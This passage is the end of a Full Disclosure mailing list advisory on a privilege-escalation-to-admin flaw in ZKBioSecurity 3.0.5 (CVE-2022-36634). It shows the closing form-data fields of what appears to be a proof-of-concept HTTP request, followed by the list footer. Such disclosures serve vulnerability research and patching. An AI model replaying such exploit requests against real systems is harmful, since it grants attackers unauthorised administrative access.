Content-Disposition: form-data; name="logMethod"





add

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="un"





1657813612925\_286

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="systemCode"





base

-----------------------------291763244192371568695079347--





#######################END#######################
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **ZKBioSecurity 3.0.5- Privilege Escalation to Admin (CVE-2022-36634)** _Caio B (Sep 30)_

Tag

#intel